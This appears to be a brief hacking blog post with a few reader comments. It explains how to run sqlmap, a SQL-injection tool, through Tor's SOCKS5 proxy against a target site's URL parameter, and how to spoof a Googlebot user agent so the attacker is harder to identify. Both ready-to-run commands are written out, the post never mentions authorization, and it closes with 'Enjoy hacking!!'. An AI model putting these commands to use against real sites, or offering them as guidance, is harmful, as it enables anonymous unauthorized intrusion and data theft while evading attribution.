When trying to exploit some website using sqlmap, its a good idea to be anonymous. Sqlmap has excellent support for using common proxies or tor.
First start tor and ensure that it is running the socks5 daemon on port 9050. Then use the socks5 proxy with sqlmap as follows
# ./sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.hackable.org/view_section.php?id=10"
The above command uses tor with type SOCKS5. The --tor option by default tries to use the HTTP proxy instead of SOCKS5. Therefor its necessary to specify the tor-type to SOCKS5.
To further improve the anonymity of the scan, use some fake user agent. Here is a quick example.
# ./sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.hackable.org/view_section.php?id=10" --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
The above example uses a google bot kind of user agent in the http headers of the scan, further complicating the identity of the hacker.
That is pretty much of it. Enjoy hacking!!
well thats not quite easy to execute
One line of code is not easy? haha
So lazy, find a different field.